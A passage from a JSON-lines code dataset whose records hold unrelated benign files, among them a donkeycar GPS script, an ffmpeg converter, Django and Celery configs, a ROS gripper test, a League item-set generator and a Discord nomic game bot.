inputs=[\"currLocation\", \"prevLocation\"], outputs=[\"steer_cmd\", \"throttle_cmd\"])\n V.add(steering, inputs=['steer_cmd'])\n V.add(throttle, inputs=['throttle_cmd'])\n\n V.start()\n\n\nif __name__ == '__main__':\n # goalLocation is a list of lists: each sublist a waypoint for the controller.\n goalLocation = [[32.8811271,-117.2342783], [32.8812414, -117.2374792]]\n\n cfg = dk.load_config() \n drive(cfg, goalLocation)\n","sub_path":"gps_manage.py","file_name":"gps_manage.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9392327","text":"# coding=UTF-8\nimport pathlib\nimport ffmpeg\n\n\ndef main(): \n root_path = pathlib.Path('.')\n root_files = [x.name for x in root_path.iterdir() if x.is_file()]\n\n for dir in root_path.iterdir():\n if dir.is_file():\n continue\n\n input_file_list = pathlib.Path(dir / 'VIDEO_TS/').glob('VTS_01_*.VOB')\n\n for input_file in input_file_list:\n if input_file.name == 'VTS_01_0.VOB':\n continue\n\n file_num = input_file.name.replace('VTS_01_', '-').replace('.VOB', ' ')\n output_file_name = dir.name.replace('ビデオ 家族の記録 ', '').replace(' ', file_num) + '.mp4'\n\n if 
output_file_name in root_files:\n print('pass')\n continue\n\n stream = ffmpeg.input(input_file)\n stream = ffmpeg.output(stream, output_file_name)\n\n ffmpeg.run(stream)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ffmpeg-converter.py","file_name":"ffmpeg-converter.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"17778420","text":"# Given an integer 0>n<=25, calculate the corresponding nth Fibonacci number\n\n# a = F(n-2)\n# b = F(n-1)\n# c = F(n)\n\nGIVEN_NUMBER = 23\n\na = 0\nb = 1\nc = 1\n\nfor i in range(1, GIVEN_NUMBER):\n c = a + b\n a = b\n b = c\n\nprint(c)\n","sub_path":"Rosalind/Fibonacci-Numbers/fibonacci-numbers.py","file_name":"fibonacci-numbers.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"251755409","text":"from __future__ import annotations\n\nimport argparse\nimport os\nimport typing as t\n\nimport attr\nimport torch\n\nimport bentoml\nfrom bentoml import Bento\nfrom bentoml._internal.bento.build_config import BentoBuildConfig\nfrom bentoml._internal.configuration.containers import BentoMLContainer\nfrom bentoml._internal.utils import resolve_user_filepath\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--tag\", type=str, default=None)\n parser.add_argument(\"--gpu\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n bento_tag = \"triton-integration-onnx\"\n if args.tag:\n bento_tag = f\"triton-integration-onnx:{args.tag}\"\n\n try:\n bentos = bentoml.get(bento_tag)\n print(f\"{bentos} already exists. Skipping...\")\n except bentoml.exceptions.NotFound:\n bentofile = resolve_user_filepath(\"bentofile.yaml\", None)\n\n override_attrs: dict[str, t.Any] = {\n \"python\": {\n \"requirements_txt\": os.path.join(\"requirements\", \"requirements-gpu.txt\")\n if args.gpu and torch.cuda.is_available()\n else os.path.join(\"requirements\", \"requirements.txt\")\n }\n }\n with open(bentofile, \"r\", encoding=\"utf-8\") as f:\n build_config = attr.evolve(BentoBuildConfig.from_yaml(f), **override_attrs)\n\n print(\n \"Saved bento:\",\n Bento.create(build_config, version=args.tag).save(\n BentoMLContainer.bento_store.get()\n ),\n )\n","sub_path":"examples/triton/onnx/build_bento.py","file_name":"build_bento.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151686079","text":"# -*- coding: utf8 -*-\nfrom __future__ import unicode_literals\n\nimport struct\n\nimport rlp\n\n\ndef test_bytearray():\n e = rlp.encode('abc')\n d = rlp.decode(e)\n d = rlp.decode(bytearray(e))\n\n\ndef test_bytearray_lazy():\n e = rlp.encode('abc')\n d = rlp.decode(e)\n d = rlp.decode_lazy(bytearray(e))\n\n\ndef test_bytearray_encode_decode():\n value = bytearray(b'asdf')\n encoded = rlp.utils.encode_hex(value)\n decoded = rlp.utils.decode_hex(encoded)\n\n assert value == decoded\n\n\ndef test_big_endian_to_int():\n assert rlp.utils.big_endian_to_int(b'\\x00') == 0\n assert rlp.utils.big_endian_to_int(bytearray(b'\\x00')) == 0\n\n value = struct.pack('>Q', 3141516)\n assert rlp.utils.big_endian_to_int(value) == 3141516\n assert rlp.utils.big_endian_to_int(bytearray(value)) == 3141516\n\n\ndef test_encoding_bytearray():\n s = rlp.utils.str_to_bytes('abcdef')\n direct = rlp.encode(s)\n from_bytearray = rlp.encode(bytearray(s))\n 
assert direct == from_bytearray\n assert rlp.decode(direct) == s\n","sub_path":"tests/test_bytearray.py","file_name":"test_bytearray.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527632872","text":"def fahr_to_celsius(temp_fahrenheit):\n converted_temp = ( temp_fahrenheit - 32 ) / 1.8\n return converted_temp\ndef temp_classifier(temp_celsius):\n if temp_celsius < -2:\n return 0\n elif temp_celsius < 2:\n return 1\n elif temp_celsius < 15:\n return 2\n else:\n return 3\n\"\"\"\nto combinate these functions to separete classes about temperature level(0,1,2,3)\n\"\"\"","sub_path":"temp_functions.py","file_name":"temp_functions.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541268369","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n # homepage\r\n path(\"\", views.home, name=\"home\"),\r\n # about\r\n path(\"about/\", views.about, name=\"about\"),\r\n # blog MainPage\r\n path(\"blog/\", views.blog, name=\"blog\"),\r\n # blog detail view\r\n path(\"blog/\", views.blog_detail, name=\"blog_detail\"),\r\n # blogposts by topic\r\n # path(\"blog/topics/\" views.blog_by_topic, name=\"blog_by_topic\"),\r\n # projects\r\n path(\"projects/\", views.projects, name=\"projects\"),\r\n # contact me\r\n path(\"contact/\", views.contact, name=\"contact\"),\r\n # redirect from contact me\r\n path(\"thanks/\", views.thanks, name=\"thanks\"),\r\n]\r\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29617101","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom celery.schedules import crontab\r\nfrom libs.config import get as wordsConfig\r\n\r\nCELERY_RESULT_BACKEND = \"mongodb\"\r\nCELERY_MONGODB_BACKEND_SETTINGS = {\r\n \"host\": wordsConfig(\"mongo.host\"),\r\n \"port\": wordsConfig(\"mongo.port\"),\r\n \"database\": wordsConfig(\"celery.mongo.db\"),\r\n \"taskmeta_collection\": \"stock_taskmeta_collection\",\r\n}\r\n\r\nCELERYBEAT_SCHEDULE = {\r\n 'every-minute': {\r\n 'task': 'tasks.add',\r\n 'schedule': crontab(minute='*/1'),\r\n 'args': (1, 2),\r\n },\r\n}\r\n","sub_path":"libs/db/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"366125886","text":"\n\n# pylint: disable=unused-import\n# pylint: disable=cyclic-import\n\nfrom datetime import datetime\nimport time\n\nimport akit.environment.activate\n\nfrom akit.xlogging.foundations import logging_initialize\n\nfrom akit.integration.landscaping.landscape import Landscape\nfrom akit.mixins.upnpcoordinatorintegration import UpnpCoordinatorIntegration\n\ndef coordinator_example_main():\n\n logging_initialize()\n\n # ==================== Landscape Initialization =====================\n # The first stage of standing up the test landscape is to create and\n # initialize the Landscape object. 
If more than one thread calls the\n # constructor of the Landscape, object, the other thread will block\n # until the first called has initialized the Landscape and released\n # the gate blocking other callers.\n lscape = Landscape()\n\n # Give the UpnpCoordinatorIntegration an opportunity to register itself, we are\n # doing this in this way to simulate test framework startup.\n UpnpCoordinatorIntegration.attach_to_framework(lscape)\n\n # Finalize the registration process and transition the landscape\n # to the activation phase\n lscape.registration_finalize()\n\n # Give the UpnpCoordinatorIntegration an opportunity to attach to its\n # environment and determine if the resources requested and the\n # resource configuration match\n UpnpCoordinatorIntegration.attach_to_environment()\n\n # Finalize the activation process and transition the landscape\n # to fully active where all APIs are available.\n lscape.activation_finalize()\n\n # Make initial contact with all of the devices\n lscape.first_contact()\n\n s18 = lscape.checkout_a_device_by_modelNumber(\"S18\").upnp\n\n value = s18.getLedState()\n\n if s18.serviceDeviceProperties().subscribe_to_events():\n var_zonename = s18.serviceDeviceProperties().lookup_event_variable(\"ZoneName\")\n znval = var_zonename.wait_for_value(timeout=600)\n print (var_zonename)\n\n isbval = s18.serviceDeviceProperties().lookup_event_variable(\"IsZoneBridge\")\n print (isbval)\n\n value, updated, changed, state = isbval.sync_read()\n\n print (\"value={}, updated={} changed={} state={}\".format(value, updated, changed, state.name))\n print ()\n\n var_zonename = s18.serviceDeviceProperties().lookup_event_variable(\"ZoneName\")\n\n before_change = datetime.now()\n s18.setZoneName(\"Blah\")\n znval = var_zonename.wait_for_update(before_change, timeout=600)\n\n print(\"\")\n print(\"\")\n print(\"Bdee bdee bdee, Thats all folks!\")\n print(\"\")\n print(\"\")\n\n\nif __name__ == \"__main__\":\n coordinator_example_main()\n","sub_path":"examples/upnp_example.py","file_name":"upnp_example.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644214868","text":"class Solution(object):\n def detectCycle(self, head):\n visited = set()\n\n node = head\n while node is not None:\n if node in visited:\n return node\n else:\n visited.add(node)\n node = node.next\n\n return None\n","sub_path":"Python/142. 环形链表 II.py","file_name":"142. 
环形链表 II.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651324288","text":"import datetime\nimport calendar\nfrom canteen_modal import Canteen, Stall\nimport db\n\nclass MainWindowController():\n\n def __init__(self,mainUi):\n db.check_DB_exist()\n self.mainUi=mainUi\n self.image_url_prefix='images/'\n self.currentDatetime=self.getCurrentSystemTime()\n self.selectedDateTime=self.currentDatetime\n #self.selectedDateTime=datetime.fromtimestamp(self.currentDatetime.)\n self.canteen=Canteen.all()[0]\n self.all_stalls=[]\n self.getStalls(self.selectedDateTime)\n #self.selectedDateTime=datetime.datetime.fromtimestamp(self.currentDatetime)\n\n def getCurrentSystemTime(self):\n return datetime.datetime.now()\n\n #return Monday to Sunday in integer\n def getDayIdByDateTime(self,datetime):\n #monday is 0, but in database is 1 so plus 1\n return datetime.weekday()+1\n #return datetime in time formate\n def getTimeByDateTime(self,datetime):\n return datetime.strftime('%H:%M:%S')\n #return '09:09:09'\n\n def getStalls(self,datetime):\n self.curr_stalls=Stall.fetchStalls(self.getDayIdByDateTime(datetime),self.getTimeByDateTime(datetime))\n \n def useCurrentDateTime(self):\n self.currentDatetime=self.getCurrentSystemTime()\n self.setSelectTime(self.currentDatetime)\n\n #set select time to newValue and update in UI\n def setSelectTime(self,newValue):\n self.selectedDateTime=newValue\n self.getStalls(self.selectedDateTime)\n self.mainUi.updateDateTimeText(self.selectedDateTime)\n self.mainUi.onSearchTextChange()\n \n #non hala,fast food and halal , but since we only has fast food and other, we just compare 2 condition\n def filterStall(self, text, fastfoodChecked, nonfastFoodChecked):\n filteredStall = [] # reset\n for stall in self.curr_stalls:\n if stall.name.lower().find(text.lower()) != -1:\n if fastfoodChecked:\n if stall.stall_types[0] == 'Fast Food':\n filteredStall.append(stall)\n if nonfastFoodChecked:\n if stall.stall_types[0] != 'Fast Food':\n filteredStall.append(stall)\n\n self.mainUi.displayStall(filteredStall)\n \n \n \n\n \n\n \n \n","sub_path":"mainWindowController.py","file_name":"mainWindowController.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"497037234","text":"\n\nfrom xai.brain.wordbase.verbs._eject import _EJECT\n\n#calss header\nclass _EJECTED(_EJECT, ):\n\tdef __init__(self,): \n\t\t_EJECT.__init__(self)\n\t\tself.name = \"EJECTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"eject\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_ejected.py","file_name":"_ejected.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"425129438","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/ore/svn/tests/all.py\n# Compiled at: 2008-04-15 01:26:21\nimport unittest, test_Node, test_File, test_Directory, test_Properties, test_Transaction\n\ndef test_suite():\n suite = unittest.TestSuite()\n for mod in [test_Node, test_File, test_Directory, test_Properties, test_Transaction]:\n suite.addTests(mod.test_suite())\n\n return suite\n\n\ndef main():\n runner = unittest.TextTestRunner(verbosity=2)\n result = 
runner.run(test_suite())\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/ore.svn-1.0.5-py2.5/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260970677","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport time\n\nfrom test_gripper import GripperTester\nfrom ariac_example import ariac_example\nimport rospy\nimport rostest\n\n\nclass GripperBinDropTester(GripperTester):\n\n def test(self):\n self.comp_class = ariac_example.MyCompetitionClass()\n ariac_example.connect_callbacks(self.comp_class)\n time.sleep(1.0)\n\n self._send_arms_to_initial_pose()\n\n self._send_arm1_to_product()\n\n self._enable_gripper(arm=1)\n time.sleep(2.0)\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.enabled)\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.attached)\n\n self._send_arm1_to_tray()\n self.assertTrue(self.comp_class.arm_1_current_gripper_state.enabled)\n self.assertFalse(self.comp_class.arm_1_current_gripper_state.attached)\n\n\nif __name__ == '__main__':\n rospy.init_node('test_gripper_bin_drop', anonymous=True)\n\n # Wait until /clock is being published; this can take an unpredictable\n # amount of time when we're downloading models.\n while rospy.Time.now().to_sec() == 0.0:\n print('Waiting for Gazebo to start...')\n time.sleep(1.0)\n # Take an extra nap, to allow plugins to be loaded\n time.sleep(12.0)\n print('OK, starting test.')\n\n rostest.run('test_ariac', 'test_gripper_bin_drop', GripperBinDropTester, sys.argv)\n","sub_path":"ariac_ws/src/ARIAC/test_ariac/test_gripper_drop_over_bins.py","file_name":"test_gripper_drop_over_bins.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471752020","text":"from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\nclass Migration(migrations.Migration):\n dependencies = [('application', '0001_initial')]\n \n operations = [\n migrations.CreateModel(\n name='Resource',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('content', models.TextField()),\n ('created_by', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","sub_path":"src/application/migrations/0002_resource.py","file_name":"0002_resource.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494251148","text":"from os import path, makedirs\nfrom urllib.request import urlopen as uopen\nfrom json import load, dump\nfrom operator import itemgetter\nfrom shutil import rmtree\n\n\ndef setToItems(block):\n if block:\n items = sorted(block.items(), key=itemgetter(1), reverse=True)\n return [{\"id\": item[0], \"count\": 1} for item in items]\n return []\n\n\ndef mapSkills(block):\n if block:\n return \"\".join([[\"Q\", \"W\", \"E\", \"R\"][int(x) - 1] for x in\n sorted(block.items(), key=itemgetter(1),\n reverse=True)[0][0]])\n return \"No skill info\"\n\n\ndef processSet(champ, pos, sets, champsFolder, groups, wins=False, ver=\"\"):\n sets[\"other\"] = {\"2003\": 10, \"2031\": 9, \"2032\": 8, \"2033\": 7, \"2055\": 6,\n \"2138\": 5, \"2139\": 4, \"2140\": 3, \"3340\": 2, \"3363\": 1,\n \"3364\": 0}\n 
groups[\"startingitempick\"] = \"Pick: \" + mapSkills(sets.get(\"skillpick\"))\n if wins:\n groups[\"startingitemwin\"] = \"Wins: \" + mapSkills(sets.get(\"skillwin\"))\n blocks = [{\"type\": groups[item], \"items\": setToItems(sets.get(item))}\n for item in groups]\n outputFolder = path.join(champsFolder, champ, \"Recommended\")\n makedirs(outputFolder, exist_ok=True)\n with open(path.join(outputFolder, f\"LoLa_{pos}.json\"), \"w\") as f:\n dump({\"title\": f\"Lolalytics {pos} {ver}\", \"champion\": champ,\n \"map\": \"any\", \"mode\": \"any\", \"sortrank\": 1, \"type\": \"custom\",\n \"blocks\": blocks}, f, separators=(',', ':'))\n\n\ndef updateSets(folder, keep=False, wins=False):\n cFolder = path.join(folder, \"Config\", \"Champions\")\n if not keep:\n if path.exists(cFolder):\n rmtree(cFolder, ignore_errors=True)\n with uopen(\"http://championify.lolalytics.com/data/1.0/ranked.json\") as p:\n page = load(p)\n ver = page[\"version\"]\n groups = {\"startingitempick\": \"\", \"item1pick\": \"First\",\n \"bootspick\": \"Boots\", \"item2pick\": \"Second\",\n \"item3pick\": \"Third\", \"item4pick\": \"Fourth\",\n \"item5pick\": \"Fifth\"}\n if wins:\n groups[\"startingitemwin\"] = \"\"\n groups[\"item1win\"] = \"First\"\n groups[\"bootswin\"] = \"Boots\"\n groups[\"item2win\"] = \"Second\"\n groups[\"item3win\"] = \"Third\"\n groups[\"item4win\"] = \"Fourth\"\n groups[\"item5win\"] = \"Fifth\"\n groups[\"other\"] = \"Other\"\n for c in page[\"stats\"]:\n for p in page[\"stats\"][c]:\n processSet(c, p, page[\"stats\"][c][p], cFolder, groups, wins, ver)\n","sub_path":"lolalytics_sets/lolalytics.py","file_name":"lolalytics.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605530389","text":"import asyncio\nfrom datetime import datetime\n\nfrom discord.ext import commands\nimport discord\n\nfrom constants import colors, emoji\nfrom utils import mutget, mutset, lazy_mutget, make_embed, format_discord_color, member_sort_key\nimport database\nimport nomic.logging\n\n\nVOTE_TYPES = ('for', 'against', 'abstain')\n\nTIME_FORMAT = 'UTC %H:%M:%S on %Y-%m-%d'\n\ngames = {}\n\ndef get_game(ctx):\n return lazy_mutget(games, [ctx.guild.id], lambda: Game(ctx))\n\nclass Game:\n def __init__(self, ctx):\n self.guild = ctx.guild\n self.guilds_database = database.get_db('guilds')\n self.guild_data = mutget(self.guilds_database, [str(self.guild.id)], {})\n\n def save(self):\n self.guilds_database.save()\n\n def _rule_property(key, default_value=None, *,\n getter_func=lambda self, x: x, setter_func=lambda self, x: x):\n def get_val(self):\n return getter_func(self, mutget(self.guild_data, [key], default_value))\n def set_val(self, value):\n mutset(self.guild_data, [key], setter_func(self, value))\n # self.save()\n def del_val(self):\n del self.guild_data[key]\n # self.save()\n return property(get_val, set_val, del_val)\n\n def _add_rule_property(key, *args, **kwargs):\n setattr(Game, key, Game._rule_property(key, *args, **kwargs))\n\n def _try_get_channel(self, channel_id):\n try:\n return self.guild.get_channel(int(channel_id))\n except:\n return None\n\n def get_proposal(self, n):\n proposal = self.proposals.get(str(n))\n if proposal:\n return proposal\n else:\n raise commands.UserInputError(f\"Proposal #{n} does not exist.\")\n\n async def wait_delete_if_illegal(self, *messages):\n if messages and messages[0].channel.id in (self.proposal_channel and self.proposal_channel.id,\n self.transaction_channel and 
self.transaction_channel.id):\n await asyncio.sleep(5)\n await messages[0].channel.delete_messages(messages)\n\n async def submit_proposal(self, ctx, content):\n self.proposal_count += 1\n m = await self.proposal_channel.send(embed=make_embed(\n color=colors.EMBED_INFO,\n title=f\"Preparing proposal #{self.proposal_count}\\N{HORIZONTAL ELLIPSIS}\"\n ))\n timestamp = datetime.utcnow()\n mutset(self.guild_data, ['proposals', str(self.proposal_count)], {\n 'n': self.proposal_count,\n 'author': ctx.author.id,\n 'content': content,\n 'message': m.id,\n # 'status' can be 'voting', 'passed', or 'failed'\n 'status': 'voting',\n 'votes': {\n 'for': {},\n 'against': {},\n 'abstain': {},\n },\n 'timestamp': timestamp.timestamp(),\n })\n self.save()\n nomic.logging.add_to_proposal_log(self.guild,\n timestamp=timestamp,\n event_name='submit',\n user_id=ctx.author.id,\n proposal_number=self.proposal_count\n )\n await self.refresh_proposal(self.proposal_count)\n\n async def refresh_proposal(self, *proposal_nums):\n \"\"\"Returns a tuple (succeeded, failed), where each element is a list of\n proposal numbers that were either successfully or unsuccessfully\n refreshed.\"\"\"\n succeeded = []\n failed = []\n need_to_save = False\n for proposal_num in proposal_nums:\n # try:\n proposal = self.get_proposal(proposal_num)\n try:\n m = await self.proposal_channel.get_message(int(proposal.get('message')))\n except:\n m = None\n fields = []\n for vote_type in VOTE_TYPES:\n votes = mutget(proposal, ['votes', vote_type])\n vote_lines = []\n total_vote_count = 0\n for user_id in sorted(votes.keys(), key=member_sort_key(self.guild)):\n vote_count = votes.get(user_id)\n if vote_count:\n member = self.guild.get_member(int(user_id))\n if member:\n line = member.mention\n if vote_count != 1:\n line += f\" ({vote_count}x)\"\n vote_lines.append(line)\n total_vote_count += vote_count\n field_name = vote_type.capitalize()\n if total_vote_count:\n field_name += f\" ({total_vote_count})\"\n fields.append((field_name, '\\n'.join(vote_lines) or \"(none)\", True))\n if not (self.allow_abstain_vote and proposal['votes']['abstain']):\n del fields[-1]\n member = self.guild.get_member(proposal.get('author'))\n status = proposal.get('status')\n pass_fail_text = ''\n if status != 'voting':\n pass_fail_text = \" \\N{EM DASH} \"\n pass_fail_text += status.capitalize()\n timestamp = datetime.fromtimestamp(proposal.get('timestamp'))\n embed = make_embed(\n color={\n 'voting': colors.EMBED_INFO,\n 'passed': colors.EMBED_SUCCESS,\n 'failed': colors.EMBED_ERROR,\n }[status],\n title=f\"Proposal #{proposal.get('n')}{pass_fail_text}\",\n description=proposal.get('content'),\n fields=fields,\n footer_text=f\"Submitted at {timestamp.strftime(TIME_FORMAT)} by {member.name}#{member.discriminator}\"\n )\n if m is None:\n m = await self.proposal_channel.send(embed=embed)\n proposal['message'] = m.id\n need_to_save = True\n else:\n await m.edit(embed=embed)\n await m.clear_reactions()\n if status == 'voting':\n await m.add_reaction(emoji.VOTE_FOR)\n await m.add_reaction(emoji.VOTE_AGAINST)\n if self.allow_abstain_vote:\n await m.add_reaction(emoji.VOTE_ABSTAIN)\n succeeded.append(proposal_num)\n # except:\n # failed.append(proposal_num)\n if need_to_save:\n self.save()\n return (succeeded, failed)\n\n async def repost_proposal(self, *proposal_nums):\n try:\n start = min(map(int, proposal_nums))\n if not 1 <= start <= self.proposal_count:\n raise Exception()\n except:\n raise commands.UserInputError(\"Bad proposal numbers(s).\")\n end = 
self.proposal_count + 1\n for proposal_num in range(start, end):\n proposal = self.get_proposal(proposal_num)\n try:\n await (await self.proposal_channel.get_message(proposal['message'])).delete()\n except:\n pass\n proposal['message'] = None\n await self.refresh_proposal(*range(start, end))\n\n async def remove_proposal(self, user, *proposal_nums, reason='', m=None):\n if m:\n human_proposals = f\"{len(proposal_nums)} proposal{'s' * (len(proposal_nums) != 1)}\"\n title = f\"Removing {human_proposals}\\N{HORIZONTAL ELLIPSIS}\"\n await m.edit(embed=make_embed(\n color=colors.EMBED_INFO,\n title=title,\n description=\"Removing proposals\\N{HORIZONTAL ELLIPSIS}\"\n ))\n number_sequence = list(range(1, self.proposal_count + 1))\n for proposal_num in proposal_nums:\n proposal = self.get_proposal(proposal_num)\n del self.proposals[str(proposal_num)]\n number_sequence.remove(proposal_num)\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='remove_proposal',\n user_id=user.id,\n proposal_number=proposal_num,\n reason=reason,\n )\n try:\n message = await self.proposal_channel.get_message(proposal.get('message'))\n await message.delete()\n except:\n pass\n self.proposal_count = len(number_sequence)\n if number_sequence:\n if m:\n await m.edit(embed=make_embed(\n color=colors.EMBED_INFO,\n title=title,\n description=\"Renumbering remaining proposals\\N{HORIZONTAL ELLIPSIS}\"\n ))\n moved_proposals = []\n for i in range(len(number_sequence)):\n old_num = str(number_sequence[i])\n new_num = str(i + 1)\n if old_num != new_num:\n self.proposals[new_num] = self.proposals[old_num]\n del self.proposals[old_num]\n self.proposals[new_num]['n'] = new_num\n moved_proposals.append(new_num)\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='renumber',\n user_id=user.id,\n proposal_number=old_num,\n new_number=new_num,\n )\n self.save()\n await self.refresh_proposal(*moved_proposals)\n else:\n self.save()\n if m:\n await m.edit(embed=make_embed(\n color=colors.EMBED_SUCCESS,\n title=f\"Removed {human_proposals}\"\n ))\n\n async def vote(self, *, proposal_num, vote_type, user_id, user_agent_id=None, count=1, reason=''):\n \"\"\"Add/change a vote to a proposal.\n\n *\n proposal_num -- Number of the proposal\n vote_type -- One of ('for', 'against', 'abstain', 'remove')\n user_id -- User whose vote is being added/changed\n user_agent_id -- User doing the changing (defaults to same as user)\n count -- Amount of timse to vote (defaults to 1)\n\n You should usually put this in a try-catch.\n \"\"\"\n user_id = str(user_id)\n if count < 1:\n raise commands.UserInputError(\"Invalid vote count.\")\n if count > 1 and not self.allow_multi_vote:\n raise commands.UserInputError(\"Multivoting is not allowed.\")\n if vote_type == 'abstain' and not self.allow_abstain_vote:\n raise commands.UserInputError(\"Abstaining is not allowed.\")\n proposal = self.get_proposal(proposal_num)\n if proposal.get('status') != 'voting':\n raise commands.UserInputError(\"Voting is closed for this proposal.\")\n votes = proposal.get('votes')\n voting_users = set().union(*(votes.get(k).keys() for k in VOTE_TYPES))\n if vote_type == 'remove':\n for k in VOTE_TYPES:\n if user_id in votes.get(k):\n del votes.get(k)[user_id]\n elif vote_type in VOTE_TYPES:\n if user_id in votes.get(vote_type):\n if self.allow_multi_vote:\n votes.get(vote_type)[user_id] += count\n else:\n raise commands.UserInputError(\"Voting multiple times on one proposal is not allowed.\")\n elif user_id in voting_users:\n if self.allow_change_vote:\n for k in 
VOTE_TYPES:\n kvotes = votes.get(k)\n if user_id in kvotes:\n kvotes[user_id] -= 1\n if kvotes[user_id] == 0:\n del kvotes[user_id]\n else:\n raise commands.UserInputError(\"Changing votes is not allowed.\")\n else:\n votes.get(vote_type)[user_id] = count\n else:\n raise commands.UserInputError(\"Invalid vote type.\")\n self.save()\n nomic.logging.add_to_vote_log(self.guild,\n vote_type=vote_type,\n agent_id=user_agent_id,\n user_id=user_id,\n proposal_number=proposal_num,\n vote_count=count,\n reason=reason,\n )\n await self.refresh_proposal(proposal_num)\n\n async def set_proposal_status(self, user, new_status, *proposal_nums, reason=''):\n succeeded = []\n failed = []\n for proposal_num in proposal_nums:\n try:\n self.get_proposal(proposal_num)['status'] = new_status\n nomic.logging.add_to_proposal_log(self.guild,\n event_name='set_' + new_status,\n user_id=user.id,\n proposal_number=proposal_num,\n reason=reason,\n )\n succeeded.append(proposal_num)\n except:\n failed.append(proposal_num)\n self.save()\n await self.refresh_proposal(*proposal_nums)\n return (succeeded, failed)\n\n def get_currency(self, name):\n name = name.lower()\n if name in self.currencies:\n return self.currencies[name]\n for c in self.currencies.values():\n if name in c['aliases']:\n return c\n return None\n\n def add_currency(self, name, color, aliases=[]):\n for s in [name] + aliases:\n if self.get_currency(s):\n raise commands.UserInputError(f\"The name {s} is already taken by another currency.\")\n self.currencies[name] = {\n 'name': name,\n 'color': format_discord_color(color),\n 'aliases': aliases,\n 'players': {}\n }\n self.save()\n\n def get_transaction(self, n):\n return self.transactions[n - 1]\n\n def format_transaction(self, transaction, include_total=False):\n s = \"**\"\n amt = transaction['amount']\n if amt >= 0:\n s += \"+\"\n s += f\"{amt} {transaction['currency_name']}**\"\n s += \" to \" if amt >= 0 else \" from \"\n s += self.guild.get_member(transaction['user_id']).mention\n if include_total:\n player_amounts = self.currencies[transaction['currency_name']]['players']\n player_total = player_amounts.get(str(transaction['user_id']), 0)\n s += f\" (now {player_total})\"\n if transaction.get('reason'):\n s += f\" {transaction.get('reason')}\"\n return s\n\n async def transact(self, transaction, reason=''):\n amount = transaction['amount']\n currency_name = transaction['currency_name']\n user_id = transaction['user_id']\n user_agent_id = transaction['user_agent_id']\n timestamp = datetime.utcnow()\n currency = self.get_currency(currency_name)\n user_agent = self.guild.get_member(user_agent_id)\n mutget(currency, ['players', str(user_id)], 0)\n currency['players'][str(user_id)] += amount\n m = await self.transaction_channel.send(embed=make_embed(\n color=int(currency.get('color')[1:], 16) or colors.EMBED_INFO,\n description=self.format_transaction(transaction, include_total=True),\n footer_text=f\"Authorized at {timestamp.strftime(TIME_FORMAT)} by {user_agent.name}#{user_agent.discriminator}\"\n ))\n self.transaction_messages.append(m.id)\n self.save()\n nomic.logging.add_to_transaction_log(self.guild,\n timestamp=timestamp,\n currency=currency_name,\n agent_id=user_agent_id,\n recipient_id=user_id,\n amt=amount,\n reason=reason,\n )\n\n\nGame._add_rule_property('allow_abstain_vote', 